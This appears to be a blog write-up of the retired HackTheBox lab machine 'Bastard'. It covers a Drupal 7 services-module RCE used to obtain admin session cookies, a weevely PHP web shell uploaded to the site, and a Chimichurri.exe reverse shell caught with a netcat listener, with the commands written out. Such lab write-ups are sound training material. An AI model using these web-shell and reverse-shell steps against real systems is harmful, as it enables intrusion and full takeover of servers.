Wednesday 2 May 2018

10.10.10.9 BASTARD hackthebox machine Write Up

BASTARD 10.10.10.9 Write Up

Machine Created by ch4p
Machine is retired
Windows OS

Tools used:

Enumeration:

Nmap
GoBuster
Nikto

Exploitation:

Metasploit
NetCat

Steps:

Enumeration and Exploitation:

1. After running nikto, we got the Drupal 7 CMS used on port 80 and some vulnerabilities are on it.
2. Then after some googling we can find this, https://www.ambionics.io/blog/drupal-services-module-rce. From there we can understand  that we are able to generate some sessions and session cookies from this vuln.
3. First we use those cookies and goto admin panel. Now we generate a shell with weevely and upload it.
command to generate shell:
weevely generate Password shell.php
command to got access to the shell:
weevely http://10.10.10.9/node/N Password
where N is the number of the new page.
 4. Now upload this Chimichurri.exe to the server and get a reverse shell on NetCat.
https://github.com/Re4son/Chimichurri/
Command for Chimichurri:
chimichurri.exe IP PORT
Command on NetCat:
nv -lvnp PORT
6. Now just goto the Desktop and get flags.

Hints:

Reference:

https://watchergp.com/2017/09/18/hackthebox-writeup-bastard/
https://medium.com/@0katz/bastard-ctf-writeup-4d031274033e

Video:

https://www.youtube.com/watch?v=lP-E5vmZNC0
Posted by on
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)